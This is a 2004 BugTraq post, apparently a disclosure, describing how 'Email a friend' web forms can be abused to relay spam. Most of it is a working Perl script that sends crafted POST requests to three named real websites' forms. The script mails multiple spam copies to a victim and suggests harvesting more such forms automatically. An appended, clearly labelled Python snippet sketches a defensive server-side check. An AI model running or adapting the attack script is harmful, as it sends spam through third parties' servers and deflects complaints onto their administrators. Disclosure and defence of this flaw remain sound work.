BugTraq
Spammers can hide behind 'Email a friend/article' scripts. Apr 26 2004 08:26PM
cyber_flash hotmail com (2 replies)


# Author: Vengy

# Email: cyber_flash (at) hotmail (dot) com [email concealed]

# Description: Spammers can hide behind 'Email a friend/article' scripts.

#

#

# How it works:

# -------------

# This simple perl script will send just 3 identical fake spam messages

# to 'yourname (at) yourdomain (dot) com [email concealed]' from 'vengy (at) spam4u (dot) com [email concealed]'. Example:

#

# +------------------------------------------+

# | From : <vengy (at) spam4u (dot) com [email concealed]> |

# | Sent : Friday, April 9, 2004 6:34 PM |

# | To : <yourname (at) yourdomain (dot) com [email concealed]> |

# | Subject : To spam or not to spam! |

# | |

# | Urgent! Call me: 1-900-EAT-SPAM |

# | |

# | www.spammmmmm.com |

# +------------------------------------------+

#

# If a spammer or victim sends junk email directly to their ISP SMTP servers,

# network Admins can trace back the connection and deal with the problem.

#

# But, the 'Email a friend' technique will deflect a significant portion of

# the complaints away from spammers and towards the administrators of the hijacked host.

#

# There are possibly zillions of insecure 'Email a friend/article' scripts on the web! (just google it)

# Many allow multiple unrestricted emails to be sent separated by commas.

# (Imagine an automated harvester to compile a list of open spam servers!)

#

# For demonstrational purposes, here are two random servers:

#

#

# Host:                       Outgoing SMTP Server:   Email Originator:

# =====                       =====================   =================

# www.wcqp.com                relay.westlaw.com       eg-fsite-b12.ecom.tlrg.com

# edinburghnews.scotsman.com  macdui.scotsman.com     80-75-65-10.eqsn.net

#

#

# Notes: Relaying is denied (550) when connecting directly to the SMTP servers.

# However, by using email forms, the Originator has access to send messages!

#

#

# Arguments to Send_SPAM are:

# ---------------------------

# 1. Webserver.

# 2. Email script.

# 3. Host.

# 4. Content.

# 5. Email address of Victim.

# 6. Number of copies to send.

use IO::Socket::INET qw(CRLF);

my $victim = 'yourname (at) yourdomain (dot) com [email concealed]';

my $copies = 3;

my $sender_email = 'vengy (at) spam4u (dot) com [email concealed]';

my $sender_name = 'vengy';

my $subject = 'To+spam+or+not+to+spam%21';

my $body = 'Urgent!+Call+me:+1-900-EAT-SPAM';

my $spam_url = 'http%3A%2F%2Fwww.spammmmmm.com';

################## Spam Server #1 ##################

Send_SPAM('www.wcqp.com',

'FSL5CS/Custom/emailPageConfirm.asp',

'www.wcqp.com',

'friend_name='.("%2C" x ($copies-1)).'&friend_email='.$victim.'&your_name='.$sender_name.'&your_email='.$sender_email.'&subject='.$subject.'&comments='.$body.'&url='.$spam_url,

$victim,

$copies);

################## Spam Server #2 ##################

Send_SPAM('216.55.105.36.hera.net',

'recommend.php/en/',

'toolbox.academicpriority.co.il',

'recommend='.$spam_url.'&friendsemail='.$victim.'&youremail='.$sender_email.'&yourname='.$sender_name,

$victim,

1);

################## Spam Server #3 ##################

Send_SPAM('www.scotsman.com',

'email2.cfm',

'edinburghnews.scotsman.com',

'id=364942004&referringtemplate='.$spam_url.'&referringquerystring=id%3D&recipientemail='.$victim.'&sendername='.$sender_name.'&senderemail='.$sender_email.'&subject='.$subject.'&message='.$body,

$victim,

$copies);

sub Send_SPAM {

my ($server,$url,$host,$content,$email_to,$email_num) = @_;

$repeat_email_to = ($email_to."%2C") x $email_num;

substr($repeat_email_to,-3,3) = "";

$content =~ s/$email_to/$repeat_email_to/;

$sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 'http(80)',Proto => 'tcp');

die "$!" unless $sock;

$sock->autoflush();

print $sock 'POST /'.$url.' HTTP/1.1',CRLF,

'Host: '.$host,CRLF,

'Content-Type: application/x-www-form-urlencoded',CRLF,

'Content-Length: '.length($content),CRLF,

'Connection: Keep-Alive',CRLF,

'Cache-Control: no-cache',CRLF x 2,

$content;

close $sock;

print "Sent SPAM from server: $server\n";

}
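
Added example, not part of the original post: a server-side check an 'Email a friend' handler could apply to close the gaps the post describes (comma-separated recipient lists, unlimited sends, arbitrary link). The field names follow the first form in the script; `SITE_HOST`, the limits and `check_share_request` are assumptions made for this sketch.

```python
import re
import time
from urllib.parse import urlsplit

# Assumed policy values (hypothetical, not from the post)
SITE_HOST = "www.example.com"  # only pages on this host may be shared
MAX_SENDS = 3                  # messages per client address per window
WINDOW_SECONDS = 3600

_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
_sent = {}  # client address -> timestamps of accepted sends


def check_share_request(form, client_ip, now=None):
    """Return (ok, reason) for one decoded form submission."""
    now = time.time() if now is None else now
    # Exactly one recipient: fullmatch rejects commas, spaces and CR/LF.
    if not _ADDR.fullmatch(form.get("friend_email", "")):
        return False, "recipient must be a single address"
    if not _ADDR.fullmatch(form.get("your_email", "")):
        return False, "invalid sender address"
    # Fields that end up in mail headers must not carry line breaks.
    for field in ("your_name", "subject"):
        if re.search(r"[\r\n]", form.get(field, "")):
            return False, "line break in " + field
    # The shared link must point at this site, not an arbitrary URL.
    try:
        link = urlsplit(form.get("url", ""))
    except ValueError:
        return False, "url is not on this site"
    if link.scheme not in ("http", "https") or link.hostname != SITE_HOST:
        return False, "url is not on this site"
    # Sliding-window limit per client; only accepted sends are counted.
    recent = [t for t in _sent.get(client_ip, []) if now - t < WINDOW_SECONDS]
    if len(recent) >= MAX_SENDS:
        _sent[client_ip] = recent
        return False, "rate limit exceeded"
    _sent[client_ip] = recent + [now]
    return True, "ok"


if __name__ == "__main__":
    # Constructed submissions; addresses use reserved example domains.
    ok = {"friend_email": "friend@example.org", "your_email": "me@example.net",
          "your_name": "Me", "subject": "Worth a read",
          "url": "http://www.example.com/article/1"}
    comma_list = dict(ok, friend_email="a@example.org,b@example.org")
    for form in (ok, comma_list):
        print(check_share_request(form, "192.0.2.10"))
```

The in-memory counter only illustrates the limit; a deployed handler would keep it in shared storage and build the message body from a fixed template.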

Re: Spammers can hide behind 'Email a friend/article' scripts. Apr 27 2004 09:10AM
3APA3A (3APA3A SECURITY NNOV RU)